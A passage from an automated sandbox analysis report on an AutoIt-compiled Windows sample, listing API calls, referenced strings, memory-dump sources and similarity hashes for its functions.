• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 005A1232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 005A1245
• IsWindowVisible.USER32(00000000), ref: 005A12A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005A12BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005A12D0
• GetWindowRect.USER32(00000000,?), ref: 005A12E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 005A130E
• GetMonitorInfoW.USER32(00000000,?), ref: 005A1328
• CopyRect.USER32(?,?), ref: 005A133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 005A13AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
• Instruction ID: 198b70755214fe71dde5ade3987a4bcd251b9b3215ad0fd46f9e56ff55373691
• Opcode Fuzzy Hash: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
• Instruction Fuzzy Hash: D9B18E71608741AFE704DF64C888BAEBFE5FF89350F008919F9999B261D731E844CB95
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00528968
• GetSystemMetrics.USER32(00000007), ref: 00528970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0052899B
• GetSystemMetrics.USER32(00000008), ref: 005289A3
• GetSystemMetrics.USER32(00000004), ref: 005289C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005289E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005289F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00528A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00528A3C
• GetClientRect.USER32(00000000,000000FF), ref: 00528A5A
• GetStockObject.GDI32(00000011), ref: 00528A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00528A81
  • Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
  • Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
  • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
  • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D
• SetTimer.USER32(00000000,00000000,00000028,005290FC), ref: 00528AA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: @U=u$AutoIt v3 GUI
• API String ID: 1458621304-2077007950
• Opcode ID: fe5deceef4e13fe186f1359ca5ea59672493616eaece5e696c8dce377e7d2496
• Instruction ID: a49518bc8308b6110373f55120e4a08c53023691890e86ad0f41bf4d57921c7d
• Opcode Fuzzy Hash: fe5deceef4e13fe186f1359ca5ea59672493616eaece5e696c8dce377e7d2496
• Instruction Fuzzy Hash: AAB17971A0021A9FDB14DFA8DD89BAE7FB5FB49314F104229FA15EB2D0DB30A840DB55
APIs
• LoadIconW.USER32(00000063), ref: 00575A2E
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00575A40
• SetWindowTextW.USER32(?,?), ref: 00575A57
• GetDlgItem.USER32(?,000003EA), ref: 00575A6C
• SetWindowTextW.USER32(00000000,?), ref: 00575A72
• GetDlgItem.USER32(?,000003E9), ref: 00575A82
• SetWindowTextW.USER32(00000000,?), ref: 00575A88
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00575AA9
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00575AC3
• GetWindowRect.USER32(?,?), ref: 00575ACC
• _wcslen.LIBCMT ref: 00575B33
• SetWindowTextW.USER32(?,?), ref: 00575B6F
• GetDesktopWindow.USER32 ref: 00575B75
• GetWindowRect.USER32(00000000), ref: 00575B7C
• MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00575BD3
• GetClientRect.USER32(?,?), ref: 00575BE0
• PostMessageW.USER32(?,00000005,00000000,?), ref: 00575C05
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00575C2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
• String ID: @U=u
• API String ID: 895679908-2594219639
• Opcode ID: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
• Instruction ID: f717d6a50677cd11ac83ddbc175e8d267dfc15700b27c56e0b97a4f71b2ac2ed
• Opcode Fuzzy Hash: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
• Instruction Fuzzy Hash: B0717F31900B059FDB20DFA8DE85A6EBFF5FF48705F104918E18AA35A0E7B4E944DB50
APIs
• CharUpperBuffW.USER32(?,?), ref: 005A09C6
• _wcslen.LIBCMT ref: 005A0A01
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A0A54
• _wcslen.LIBCMT ref: 005A0A8A
• _wcslen.LIBCMT ref: 005A0B06
• _wcslen.LIBCMT ref: 005A0B81
  • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
  • Part of subcall function 00572BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00572BFA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-383632319
• Opcode ID: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
• Instruction ID: 0b84ee3c1e562423bf36c7d2a3e3ff1fe8f90e3f4bb890a435a2b89ac42ce134
• Opcode Fuzzy Hash: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
• Instruction Fuzzy Hash: 0EE17A312183069FC714DF28C45096EBBE2BF9A314F14895DF8969B3A2D731ED85CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                                                                                          • Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                                                                                          • Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                                                                                          • Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                                                                                          • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570DF5
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570E29
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00570E40
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00570E7A
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570E96
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00570EAD
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570EB5
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00570EBC
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570EDD
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00570EE4
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570F13
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570F35
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570F47
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F6E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570F75
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F7E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570F85
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570F95
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00570FA1
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00570FA8
                                                                                                                          • Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
                                                                                                                          • Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
                                                                                                                          • Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4175595110-0
                                                                                                                        • Opcode ID: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
                                                                                                                        • Instruction ID: 94147933d3616d56b47a737123f6dcf21e42dfbca505811c516e75b67ece4b5c
                                                                                                                        • Opcode Fuzzy Hash: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
                                                                                                                        • Instruction Fuzzy Hash: 20714B72A0020AEBDF20DFA5EC48BAEBFB8BF15310F148115F919A6191D7719A09DB60
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 005A835A
                                                                                                                        • _wcslen.LIBCMT ref: 005A836E
                                                                                                                        • _wcslen.LIBCMT ref: 005A8391
                                                                                                                        • _wcslen.LIBCMT ref: 005A83B4
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005A83F2
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,005A361A,?), ref: 005A844E
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8487
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005A84CA
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8501
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 005A850D
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005A851D
                                                                                                                        • DestroyIcon.USER32(?), ref: 005A852C
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005A8549
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005A8555
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                        • String ID: .dll$.exe$.icl$@U=u
                                                                                                                        • API String ID: 799131459-1639919054
                                                                                                                        • Opcode ID: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
                                                                                                                        • Instruction ID: 4000e39377e1ed38495077e0679b0884a2ba5d4673d1438b79dc369000e5dc70
                                                                                                                        • Opcode Fuzzy Hash: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
                                                                                                                        • Instruction Fuzzy Hash: 9F61E07190020ABFEB14DF64CC45BBE7FA8FB49721F10450AF815DA1D1EB74A980DBA0
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059C4BD
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,005ACC08,00000000,?,00000000,?,?), ref: 0059C544
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0059C5A4
                                                                                                                        • _wcslen.LIBCMT ref: 0059C5F4
                                                                                                                        • _wcslen.LIBCMT ref: 0059C66F
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0059C6B2
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0059C7C1
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0059C84D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0059C881
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059C88E
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0059C960
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                        • Opcode ID: 70b96369dc1efc9ea5de4df8554ac23e121700b998894ec052ba4e2edb32c090
                                                                                                                        • Instruction ID: 65d6091ea8e7ebefa0a227b30dc96ce80afb7bf4a83d511ccdbefd82c9d558a1
                                                                                                                        • Opcode Fuzzy Hash: 70b96369dc1efc9ea5de4df8554ac23e121700b998894ec052ba4e2edb32c090
                                                                                                                        • Instruction Fuzzy Hash: 891248356042029FDB14DF18C895A6ABFE5FF88714F05885DF85A9B3A2DB31ED81CB81
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                        • Opcode ID: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
                                                                                                                        • Instruction ID: eaf357bb85fa78da58079f1accf41328e4737ca79a2a4b9a844b8bb73652b882
                                                                                                                        • Opcode Fuzzy Hash: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
                                                                                                                        • Instruction Fuzzy Hash: 5D71E23260016B8BCF20DE7CC9515BE3FA2BFA5764F650529F8669B284E635CD84C7A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 0-1645009161
                                                                                                                        • Opcode ID: d059f09ab43d66ab29e86ac66bb09b5378973f2e4063f9acf8bec9693d90b8e7
                                                                                                                        • Instruction ID: 8b0ea2b4074395fc69489bc7cb3bfefd18196bf34bccab275f2d21d2cdcfb67c
                                                                                                                        • Opcode Fuzzy Hash: d059f09ab43d66ab29e86ac66bb09b5378973f2e4063f9acf8bec9693d90b8e7
                                                                                                                        • Instruction Fuzzy Hash: 5B81E67160460ABBEB20AF64DC56FEE3F78FF59300F044025F905AA192EB70D985D7A1
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 005A8592
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 005A85A2
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 005A85AD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005A85BA
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 005A85C8
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005A85D7
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 005A85E0
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005A85E7
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 005A85F8
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,?), ref: 005A8611
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 005A8621
                                                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 005A8641
                                                                                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 005A8671
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005A8699
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005A86AF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3840717409-2594219639
                                                                                                                        • Opcode ID: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
                                                                                                                        • Instruction ID: 5f37d3b040e4651022a9867580da52e8007f0476a1de009eac8babf7375f861b
                                                                                                                        • Opcode Fuzzy Hash: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
                                                                                                                        • Instruction Fuzzy Hash: 9E41E675600208BFDB119FA5DC48EAE7FB8FF9AB11F144059F905EB260DB309905DB60
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[]
                                                                                                                        • API String ID: 176396367-4125391415
                                                                                                                        • Opcode ID: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
                                                                                                                        • Instruction ID: 4fce7546877220f89ca9fbb137fdb8872f5243ea5fc453e8c3f1c017bfd1431e
                                                                                                                        • Opcode Fuzzy Hash: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
                                                                                                                        • Instruction Fuzzy Hash: FCE1E732A00516ABCF28DF78D4556EDBFB1BF44720F54C52AE45AA7240EB30AE85F790
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 005A9147
                                                                                                                          • Part of subcall function 005A7674: ClientToScreen.USER32(?,?), ref: 005A769A
                                                                                                                          • Part of subcall function 005A7674: GetWindowRect.USER32(?,?), ref: 005A7710
                                                                                                                          • Part of subcall function 005A7674: PtInRect.USER32(?,?,005A8B89), ref: 005A7720
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 005A91B0
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005A91BB
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005A91DE
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 005A9225
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 005A923E
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 005A9255
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 005A9277
                                                                                                                        • DragFinish.SHELL32(?), ref: 005A927E
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005A9371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u$p#^
                                                                                                                        • API String ID: 221274066-1984542035
                                                                                                                        • Opcode ID: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
